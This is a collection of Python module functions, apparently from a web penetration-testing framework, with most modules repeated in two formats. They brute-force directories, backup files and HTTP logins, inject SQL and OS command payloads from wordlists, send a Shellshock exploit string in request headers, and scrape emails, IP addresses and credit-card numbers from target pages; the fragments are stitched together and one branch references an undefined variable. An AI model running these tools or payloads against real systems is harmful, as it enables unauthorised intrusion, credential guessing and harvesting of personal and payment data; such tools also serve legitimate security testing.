def module_run(self): test('Starting bruteforce...') host = self.options['host'] port = self.options['port'] method = self.options['method'] wordlist = self.options['wordlist'] url_path = self.options['url_path'] url_ = check_url(check_end(host,url_path),port) for line in readfile(self.check(wordlist)): url = check_end(url_,line) self.thread(url,method)
def module_run(self): test('Scanning...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host,url_path),port) for path in ['trace.axd','Trace.axd']: url = check_end(url,path) resp = self.request(url=url,method=method,data=data) if resp.code == 200: if re.search(r'<td><h1>Application Trace</h1></td>',resp.content,re.I): plus('ASP.NET trace was found: %s'%(resp.url)) return
def module_run(self): path = os.path.join(self.data_path,'os_command_injection.galileo') test('Injecting...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] headers = self.options['headers'] status = self.options['status'] url_path = self.options['url_path'] wordlist = self.options['wordlist'] if self.options['wordlist']!=('' or None) else path url = check_url(check_end(host,url_path),port) for payload in readfile(wordlist): random_string = rand_all(20) payload = payload.replace('[PAYLOAD]',random_string) if method == 'GET': urls = Replace(url,payload,data).run() for url_ in urls: print(url_) resp = self.request(url=url_,method=method,data=data) if re.search(random_string,resp.content,re.I): plus('OS Command Vulnerability was found: %s'%(resp.url)) return elif method == 'POST': url_ = Replace(url,payload,data).run()[:1] data_= Replace(url,payload,data).run()[1:] for _url_ in url_: for data in data_: resp = self.request(url=_url_,method=method,data=data) if re.search(random_string,resp.content,re.I): plus('OS Command Vulnerability was found:\n \_ URL => %s\n \_ DATA => %s'%(resp.url,data)) return else:return
def module_run(self): test('Scanning...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host, url_path), port) for path in ['trace.axd', 'Trace.axd']: url = check_end(url, path) resp = self.request(url=url, method=method, data=data) if resp.code == 200: if re.search(r'<td><h1>Application Trace</h1></td>', resp.content, re.I): plus('ASP.NET trace was found: %s' % (resp.url)) return
def module_run(self): path = os.path.join(self.data_path,'sql_injection.galileo') test('Injecting...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] url_path = self.options['url_path'] wordlist = self.options['wordlist'] if self.options['wordlist']!=('' or None) else path url = check_url(check_end(host,url_path),port) for payload in readfile(wordlist): if method == 'GET': urls = Replace(url,payload,data).run() for url_ in urls: resp = self.request(url=url_,method=method,data=data) name,error = sql_error(resp.content) if name and error: plus('SQL Injection was found: %s'%(resp.url)) print(' \_ DBMS => %s\n \_ ERROR => %s'%(name,error)) return elif method == 'POST': url_ = Replace(url,payload,data).run()[:1] data_= Replace(url,payload,data).run()[1:] for _url_ in url_: for data in data_: resp = self.request(url=_url_,method=method,data=data) name,error = sql_error(resp.content) if name and error: plus('SQL Injection was found: %s'%(resp.url)) print(' \_ DATA => %s\n \_ NAME => %s\n \_ ERROR => %s'%(data,name,error)) return else: return
def module_run(self): test('Starting bruteforce...') back_ext = [ ' (copy)/','_copy/', '- Copy/','~/','.7z', '.gz','.tar.gz','.tar','.tar.7z','.tar.bz2','.bak', '.old','.zip','.rar','.bac','_old','_bak','_backup','1','2','3' ] host = self.options['host'] port = self.options['port'] method = self.options['method'] wordlist = self.options['wordlist'] url_path = self.options['url_path'] extensions = self.to_dict(self.options['exts']) if self.options['exts'] != None else back_ext url_ = check_url(check_end(host,url_path),port) for dir_ in readfile(self.check(wordlist)): for bk in extensions: url = check_end(url_,dir_+bk) self.thread(url,method)
def module_run(self): test('Detecting...') host = self.options['host'] port = self.options['port'] url_path = self.options['url_path'] url = check_url(check_end(host,url_path),port) for m in ['GET','HEAD','BLABLA','OPTIONS','DELETE']: resp = self.request(url=url,method=m) if 'server' in resp.headers.keys(): plus('Detect Server: %s'%(resp.headers['server'])) return
def module_run(self): test('Starting bruteforce...') host = self.options['host'] port = self.options['port'] method = self.options['method'] wpass = self.options['wpass'] wuser = self.options['wuser'] url_path = self.options['url_path'] url = check_url(check_end(host,url_path),port) for user in readfile(self.check(wuser)): for passwd in readfile(self.check(wpass)): self.thread(url,method,user,passwd)
def module_run(self): test('Starting bruteforce...') host = self.options['host'] port = self.options['port'] method = self.options['method'] wpass = self.options['wpass'] wuser = self.options['wuser'] url_path = self.options['url_path'] url = check_url(check_end(host, url_path), port) for user in readfile(self.check(wuser)): for passwd in readfile(self.check(wpass)): self.thread(url, method, user, passwd)
def module_run(self): test('Detecting...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host,url_path),port) resp = self.request(url=url,method=method,data=data) for cms in ['drupal','joomla','wordpress']: funct = getattr(self,cms) bool_ = funct(resp.headers,resp.content) if bool_: plus('Found %s cms'%(cms.title())) return
def module_run(self): test('Detecting...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host, url_path), port) resp = self.request(url=url, method=method, data=data) for cms in ['drupal', 'joomla', 'wordpress']: funct = getattr(self, cms) bool_ = funct(resp.headers, resp.content) if bool_: plus('Found %s cms' % (cms.title())) return
def module_run(self): test('Searching...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] regexp = self.options['regexp'] url_path = self.options['url_path'] url = check_url(check_end(host,url_path),port) resp = self.request(url=url,method=method,data=data) bool_,lang = source_code(resp.code,resp.content) if bool_ and lang: plus2('Code disclosure vulnerability was found in: %s'%(resp.url)) if bool_ is False and lang is None: return
def module_run(self): test('Searching...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] regexp = self.options['regexp'] url_path = self.options['url_path'] url = check_url(check_end(host, url_path), port) resp = self.request(url=url, method=method, data=data) bool_, lang = source_code(resp.code, resp.content) if bool_ and lang: plus2('Code disclosure vulnerability was found in: %s' % (resp.url)) if bool_ is False and lang is None: return
def module_run(self): test('Detecting...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host, url_path), port) resp = self.request(url=url) frameworks = [ 'mvc', 'cakephp', 'cherrypy', 'django', 'flask', 'fuelphp', 'larvel', 'grails', 'nette', 'rails', 'symfony' ] for fm in frameworks: funct = getattr(self, fm) bool_ = funct(resp.headers, resp.content) if bool_: plus('Found %s Framework' % (funct.__doc__)) return
def module_run(self): test('Detecting...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host,url_path),port) resp = self.request(url=url) frameworks = [ 'mvc','cakephp','cherrypy','django','flask', 'fuelphp','larvel','grails','nette','rails','symfony' ] for fm in frameworks: funct = getattr(self,fm) bool_ = funct(resp.headers,resp.content) if bool_: plus('Found %s Framework'%(funct.__doc__)) return
def module_run(self): path = os.path.join(self.data_path, 'os_command_injection.galileo') test('Injecting...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] headers = self.options['headers'] status = self.options['status'] url_path = self.options['url_path'] wordlist = self.options['wordlist'] if self.options['wordlist'] != ( '' or None) else path url = check_url(check_end(host, url_path), port) for payload in readfile(wordlist): random_string = rand_all(20) payload = payload.replace('[PAYLOAD]', random_string) if method == 'GET': urls = Replace(url, payload, data).run() for url_ in urls: print(url_) resp = self.request(url=url_, method=method, data=data) if re.search(random_string, resp.content, re.I): plus('OS Command Vulnerability was found: %s' % (resp.url)) return elif method == 'POST': url_ = Replace(url, payload, data).run()[:1] data_ = Replace(url, payload, data).run()[1:] for _url_ in url_: for data in data_: resp = self.request(url=_url_, method=method, data=data) if re.search(random_string, resp.content, re.I): plus( 'OS Command Vulnerability was found:\n \_ URL => %s\n \_ DATA => %s' % (resp.url, data)) return else: return
def module_run(self): # https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests cc_regex = { 'American Express': r'^[34|37][0-9]{14}$', 'Mastercard': r'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$', 'Visa Card': r'^4[0-9]{12}(?:[0-9]{3})?$', 'Visa Master Card': r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$' } test('Searching...') host = self.options['host'] port = self.options['port'] data = self.options['data'] regexp = self.options['regexp'] method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host, url_path), port) c = 0 resp = self.request(url=url, method=method, data=data) try: if regexp == ('' or None): for item in cc_regex.items(): found_cc = re.findall(item[1], resp.content, re.I) if found_cc: c = 1 for xx in found_cc: print('%s => %s' % (item[0], xx)) if c == 0: info('Not found credit cards...') elif regexp != ('' or None): found_cc = re.findall(regexp, resp.content, re.I) if found_cc: for xx in found_cc: print('Found REGEX => %s' % (x)) else: info('Not found credit cards...') else: return except re.error as e: warn(e.message)
def module_run(self): path = os.path.join(self.data_path, 'sql_injection.galileo') test('Injecting...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] url_path = self.options['url_path'] wordlist = self.options['wordlist'] if self.options['wordlist'] != ( '' or None) else path url = check_url(check_end(host, url_path), port) for payload in readfile(wordlist): if method == 'GET': urls = Replace(url, payload, data).run() for url_ in urls: resp = self.request(url=url_, method=method, data=data) name, error = sql_error(resp.content) if name and error: plus('SQL Injection was found: %s' % (resp.url)) print(' \_ DBMS => %s\n \_ ERROR => %s' % (name, error)) return elif method == 'POST': url_ = Replace(url, payload, data).run()[:1] data_ = Replace(url, payload, data).run()[1:] for _url_ in url_: for data in data_: resp = self.request(url=_url_, method=method, data=data) name, error = sql_error(resp.content) if name and error: plus('SQL Injection was found: %s' % (resp.url)) print( ' \_ DATA => %s\n \_ NAME => %s\n \_ ERROR => %s' % (data, name, error)) return else: return
def module_run(self): # https://www.regular-expressions.info/email.html regexp_ = r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}' test('Searching...') host = self.options['host'] port = self.options['port'] data = self.options['data'] regexp = self.options['regexp'] if self.options['regexp'] != (''or None) else regexp_ method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host,url_path),port) c = 0 resp = self.request(url=url,method=method,data=data) try: found_email = re.findall(regexp,resp.content,re.I) if found_email: c = 1 for email in found_email: print('Email => %s'%(email)) if c == 0:info('Not found emails...') except re.error as e: warn(e.message)
def module_run(self): # https://www.regular-expressions.info/ip.html regexp_ = r'[0-9]+(?:\.[0-9]+){3}' test('Searching...') host = self.options['host'] port = self.options['port'] data = self.options['data'] regexp = self.options['regexp'] if self.options['regexp'] != (''or None) else regexp_ method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host,url_path),port) c = 0 resp = self.request(url=url,method=method,data=data) try: found_ip = re.findall(regexp,resp.content,re.I) if found_ip: c = 1 for ip in found_ip: print('Private IP => %s'%(ip)) if c == 0:info('Not found private ip...') except re.error as e: warn(e.message)
def module_run(self): r_str = rand_str(30) exploit = '() { :;}; echo; echo; echo %s'%(r_str) test('Exploiting...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] url_path = self.options['url_path'] headers = { 'User-Agent' : exploit, 'Cookie' : exploit, 'Referer' : exploit } url = check_url(check_end(host,url_path),port) # request resp = self.request(url=url,method=method,data=data,headers=headers) if resp.code == 200: if re.search(r_str,resp.content,re.I): plus('ShellShock was found in: %s'%(resp.url)) else:return else:return
def module_run(self): # https://www.regular-expressions.info/email.html regexp_ = r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}' test('Searching...') host = self.options['host'] port = self.options['port'] data = self.options['data'] regexp = self.options['regexp'] if self.options['regexp'] != ( '' or None) else regexp_ method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host, url_path), port) c = 0 resp = self.request(url=url, method=method, data=data) try: found_email = re.findall(regexp, resp.content, re.I) if found_email: c = 1 for email in found_email: print('Email => %s' % (email)) if c == 0: info('Not found emails...') except re.error as e: warn(e.message)
def module_run(self): # https://www.regular-expressions.info/ip.html regexp_ = r'[0-9]+(?:\.[0-9]+){3}' test('Searching...') host = self.options['host'] port = self.options['port'] data = self.options['data'] regexp = self.options['regexp'] if self.options['regexp'] != ( '' or None) else regexp_ method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host, url_path), port) c = 0 resp = self.request(url=url, method=method, data=data) try: found_ip = re.findall(regexp, resp.content, re.I) if found_ip: c = 1 for ip in found_ip: print('Private IP => %s' % (ip)) if c == 0: info('Not found private ip...') except re.error as e: warn(e.message)
def module_run(self): # https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests cc_regex = { 'American Express' : r'^[34|37][0-9]{14}$', 'Mastercard' : r'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$', 'Visa Card' : r'^4[0-9]{12}(?:[0-9]{3})?$', 'Visa Master Card' : r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$' } test('Searching...') host = self.options['host'] port = self.options['port'] data = self.options['data'] regexp = self.options['regexp'] method = self.options['method'] url_path = self.options['url_path'] url = check_url(check_end(host,url_path),port) c = 0 resp = self.request(url=url,method=method,data=data) try: if regexp == ('' or None): for item in cc_regex.items(): found_cc = re.findall(item[1],resp.content,re.I) if found_cc: c = 1 for xx in found_cc: print('%s => %s'%(item[0],xx)) if c == 0:info('Not found credit cards...') elif regexp != ('' or None): found_cc = re.findall(regexp,resp.content,re.I) if found_cc: for xx in found_cc: print('Found REGEX => %s'%(x)) else:info('Not found credit cards...') else: return except re.error as e: warn(e.message)
def module_run(self): r_str = rand_str(30) exploit = '() { :;}; echo; echo; echo %s' % (r_str) test('Exploiting...') host = self.options['host'] port = self.options['port'] data = self.options['data'] method = self.options['method'] url_path = self.options['url_path'] headers = { 'User-Agent': exploit, 'Cookie': exploit, 'Referer': exploit } url = check_url(check_end(host, url_path), port) # request resp = self.request(url=url, method=method, data=data, headers=headers) if resp.code == 200: if re.search(r_str, resp.content, re.I): plus('ShellShock was found in: %s' % (resp.url)) else: return else: return